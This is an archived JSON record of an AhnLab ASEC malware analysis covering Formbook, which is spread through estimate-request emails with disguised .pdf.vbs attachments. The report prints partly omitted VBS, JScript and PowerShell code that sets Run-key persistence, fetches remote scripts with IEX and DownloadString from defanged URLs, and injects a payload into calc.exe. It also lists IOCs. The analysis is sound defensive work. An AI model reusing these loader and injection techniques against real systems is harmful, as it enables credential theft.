{
	"id": "c00a7d55-516e-47cf-8f65-536c930a83a5",
	"created_at": "2026-04-06T00:16:18.122855Z",
	"updated_at": "2026-04-10T03:20:56.863383Z",
	"deleted_at": null,
	"sha1_hash": "a85b00c9a4857b9280ea886351bd49a78c715b48",
	"title": "Change in Distribution Method of Malware Disguised as Estimate (VBS Script) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1091112,
	"plain_text": "Change in Distribution Method of Malware Disguised as Estimate\r\n(VBS Script) - ASEC\r\nBy ATCP\r\nPublished: 2022-02-21 · Archived: 2026-04-05 15:39:45 UTC\r\nLast year, the ASEC analysis team discovered Formbook being distributed with a certain company’s\r\nname in its filename. Recently, the team has found that it is being distributed as a VBS file. The email used for\r\ndistribution still contains details about a request for an estimate, and by using a certain company’s name in the\r\nattachment, it prompts the user to execute it.\r\nFigure 1. Email 1\r\nFigure 2. Email 2\r\nThe compressed file attached to the email does not contain an executable but a VBS file.\r\nFigure 3. Inside the attached compressed file\r\nAll the malicious files being distributed use the same company’s name with different dates; the date in each\r\nfilename corresponds to the distribution date. The names of the files discovered so far are as follows:\r\nKor***IndustryDevelopment(2022.02.03).pdf.vbs\r\nhttps://asec.ahnlab.com/en/32149/\r\nPage 1 of 5\n\nKor***IndustryDevelopment(2022.02.04).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.07).pdf.vbs\r\nKor***IndustryDevelopment(2022-02-10).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.16).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.17).pdf.vbs\r\nKor***IndustryDevelopment(2022.02.21).pdf.vbs\r\nCertain values are obfuscated in Kor***IndustryDevelopment(2022.02.21).pdf.vbs. 
When deobfuscated, it reveals\r\ncode that registers the script under the Run key and accesses a certain URL.\r\nSub eQACeDnGd()\r\nConst zTZPNQXZ = \u0026H80000001\r\nSet izXSnKvcF=Eval(\"GetObject(WSBI() + \"\"default:StdRegProv\"\")\")\r\nCso = \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nFklft = \"jtZsps\"\r\nXqTs = \"C:\\Users\\[UserName]\\Music\\\" + [Script filename]\r\nizXSnKvcF.SetStringValue zTZPNQXZ,Cso,Fklft,XqTs\r\nEnd Sub\r\nSub FRgMMrSnNR()\r\nOn Error Resume Next\r\n Set uVzfiIPoT = Eval(\"GetObject(new:F5078F32-C551-11D3-89B9-0000F81FE221)\") 'CLASSID of MSXML2.DOMDocument.3.0\r\n uVzfiIPoT.async = False\r\n Execute(\"uVzfiIPoT.Load hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg\")\r\n Execute(\"uVzfiIPoT.transformNode (uVzfiIPoT)\")\r\nEnd Sub\r\nUpon execution, the VBS file accesses hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg and executes the\r\nadditional script hosted at this URL. It then adds C:\\Users\\\r\n[UserName]\\Music\\Kor***IndustryDevelopment(2022.02.21).pdf.vbs to the\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\jtZsps registry value so that the malicious script\r\nis executed persistently.\r\nIt also runs the command below to copy itself, under the same filename, into the C:\\Users\\[UserName]\\Music\\\r\nfolder registered in the Run key.\r\ncmd /c copy \"Kor***IndustryDevelopment(2022.02.21).pdf.vbs\" \"C:\\Users\\[UserName]\\Music\" /Y\r\nThe script code below is hosted at hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg, and when this\r\nURL is accessed, PowerShell is executed.\r\n\u003cxsl:stylesheet version=\"1.0\"\r\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\r\n xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\r\n xmlns:user=\"http://mycompany.com/mynamespace\"\u003e\r\n\u003cmsxsl:script language=\"JScript\" implements-prefix=\"user\"\u003e\r\n\u003c![CDATA[\r\n-omitted-var 
yy=r.ShellExecute(\"powershell.exe\",eioerhidfsg44g00ggg(\"2474303D27444535272E7265706C616365282744272C27492729\r\n-omitted-\r\nfunction eioerhidfsg44g00ggg(hex) {\r\n var str = '';\r\n for (var i = 0; i \u003c hex.length; i += 2) {\r\n var v = parseInt(hex.substr(i, 2), 16);\r\n if (v) str += String.fromCharCode(v);\r\n }\r\n return str;\r\n}\r\nThe obfuscated PowerShell command ultimately runs the command below and downloads additional scripts\r\nfrom hxxp://wisewomanwarrior[.]com/wp-admin/self1.jpg.\r\n$t0='IEX';\r\nsal g $t0;\r\n$gf=\"$ErrorActionPreference = 'SilentlyContinue';\r\n$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);\r\n[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;\r\nAdd-Type -AssemblyName Microsoft.VisualBasic;do {$ping = test-connection -comp google.com -count 1 -Quiet} until\r\n$tty=g('(New-Object Net.WebClient)');\r\n$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Met\r\ng([system.String]::Join('', $gf))\r\nhxxp://wisewomanwarrior[.]com/wp-admin/self1.jpg contains an obfuscated PowerShell command and compressed\r\nfile data. 
This script decompresses the data and injects it into a certain process.\r\n$eqCH=(01100110,01110101,01101110,01100011,\u003comitted\u003e ,01111101) | %{ [System.Text.Encoding]::UTF8.GetString([Sy\r\n[Byte[]]$MNB=('_\u003c1F,_\u003c8B,_\u003c08, \u003comitted\u003e,_\u003c00'.replace('_\u003c','0x'))|g;\r\n[byte[]]$FFCgPVE = tMCfkSD $MNB\r\n[Byte[]]$uiMz=('_\u003c1F,_\u003c8B,_\u003c08, \u003comitted\u003e ,_\u003c02,_\u003c00'.replace('_\u003c','0x'))|g\r\n$ayy = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,\"Load\",[Microsoft.VisualBasic.\r\n[toooyou]::Black('calc.exe',$uiMz)\r\nWhen the script above is executed, it uses a function inside the .NET executable stored in the $MNB variable\r\nto inject the data held in $uiMz into calc.exe.\r\nFigure 4. Process tree shown via AhnLab’s RAPIT system\r\nThe injected data is the Formbook infostealer. It operates by injecting itself into the legitimate process explorer.exe and\r\nanother legitimate process under the system32 path, and steals user credentials via its C\u0026C connection.\r\nC\u0026C : hxxp://www.bumabagi[.]com/p7n9/\r\nMalware disguised as an estimate has been distributed continuously for some time, so users need to remain cautious. 
As\r\nthe malicious files are disguised under the names of actual companies, as shown above, users must check the sender\r\nand refrain from opening links or attachments in emails from unknown senders.\r\nAhnLab’s anti-malware software detects and blocks the malware using the aliases below.\r\n[Behavior and Memory Detection]\r\nMalware/MDP.Inject.M3044\r\nMalware/MDP.Inject.M3509\r\nRansom/MDP.BlueCrab.M3544\r\nTrojan/Win.Formbook.XM89\r\n[File Detection]\r\nDownloader/VBS.Generic\r\nMD5\r\n23c238466940b27bf287dccaf3407923\r\ncdfbfe783f4b40bdb86c1ac3bc126596\r\nf7918d4a953248d4878f0332bd235a53\r\nURL\r\nhttp[:]//wisewomanwarrior[.]com/wp-admin/self2[.]jpg\r\nhttp[:]//www[.]bumabagi[.]com/p7n9/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/32149/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/32149/"
	],
	"report_names": [
		"32149"
	],
	"threat_actors": [],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775791256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a85b00c9a4857b9280ea886351bd49a78c715b48.pdf",
		"text": "https://archive.orkl.eu/a85b00c9a4857b9280ea886351bd49a78c715b48.txt",
		"img": "https://archive.orkl.eu/a85b00c9a4857b9280ea886351bd49a78c715b48.jpg"
	}
}